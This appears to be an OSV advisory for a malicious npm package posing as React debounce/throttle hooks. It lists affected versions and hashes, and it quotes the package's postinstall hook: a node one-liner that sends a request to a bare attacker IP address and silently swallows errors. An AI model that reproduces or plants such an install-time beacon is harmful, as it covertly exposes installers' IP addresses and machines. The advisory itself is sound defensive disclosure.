MAL-2026-5909

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-hook-use-debounce-throttle-12/MAL-2026-5909.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5909
Published
2026-06-16T17:24:02Z
Modified
2026-06-16T23:16:56.517931088Z
Summary
Malicious code in react-hook-use-debounce-throttle-12 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af)

package.json declares a postinstall hook that runs node -e to open an HTTPS request to the bare IP 8.140.205.78 on port 80, with every error silently swallowed: require('https').request({hostname:'8.140.205.78',port:80,path:'/',method:'GET',timeout:3000}).on('error',function(){}).end(). Because the https module is pointed at port 80, the TLS handshake will fail unless that host happens to speak TLS on the HTTP port; that does not matter to the operator, since the TCP connection alone delivers the installer's IP address and install time, and the empty error handler keeps the failure out of npm's output. The package advertises itself as a React debounce/throttle hooks library and has no legitimate need for network activity at install time. The destination is a bare IPv4 address with no hostname, no publisher correlation, and no documented purpose, and the request fires unconditionally whenever npm installs the package with lifecycle scripts enabled (installs run with --ignore-scripts do not trigger it), leaking the installer's IP, install timing, and machine footprint to whoever controls that host. Author metadata is a generic placeholder (dev-utils <dev@utils-lib.dev>) with a repository URL that does not resolve to a real project, and the package name carries a numeric suffix consistent with disposable republishes. The combination of an install-time beacon to attacker-controlled infrastructure, a purpose mismatched with the package's stated function, silent error handling, and a placeholder publisher identity marks this as a victim-enumeration/install-tracking attack.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "f7491b25e457c908dae1b32fe800f461843e4463807c8590044e4b7cc769843a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-16T17:24:02Z",
            "id": "IN-MAL-2026-006801",
            "versions": [
                "1.0.0"
            ],
            "import_time": "2026-06-16T18:10:21.109051992Z"
        },
        {
            "sha256": "882aa89fb511fb5cfe781f6b4242ae72abb1d089ec9b619056341a5f244183e2",
            "source": "amazon-inspector",
            "modified_time": "2026-06-16T22:30:57Z",
            "versions": [
                "1.0.2"
            ],
            "id": "IN-MAL-2026-006852",
            "import_time": "2026-06-16T23:03:43.924049399Z"
        },
        {
            "sha256": "b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af",
            "source": "amazon-inspector",
            "modified_time": "2026-06-16T22:30:59Z",
            "id": "IN-MAL-2026-006856",
            "versions": [
                "1.0.1"
            ],
            "import_time": "2026-06-16T23:03:44.221726355Z"
        }
    ]
}
References
Credits

Affected packages

npm / react-hook-use-debounce-throttle-12

Package

Name
react-hook-use-debounce-throttle-12
Purl
pkg:npm/react-hook-use-debounce-throttle-12

Affected ranges

Affected versions

1.*
1.0.0
1.0.1
1.0.2

Database specific

cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-hook-use-debounce-throttle-12/MAL-2026-5909.json"
indicators
{
    "evidence_files": [
        {
            "sha256": "2a569500b2facf7961423e147d69add31f30eb0c39f9740f8f6d95b38519e946",
            "tlsh": "dc01f1b58460daa31fd495955d5a294ae6320c0f401c7c18e3d3803c87cd6ae687c6ae",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-I5aCPxI0OkhvQfYyEnKGib+FWXhwHs0GxDpajWZjtlpS5EHNAJpYMRLr1LH8Veq8fQaqlu3Uly6rLXFLAELqEw==",
                "sha1": "51385b702bfd7eb72ff1912ec3d19b3015cccb14"
            },
            "filename": "react-hook-use-debounce-throttle-12-1.0.0.tgz"
        }
    ]
}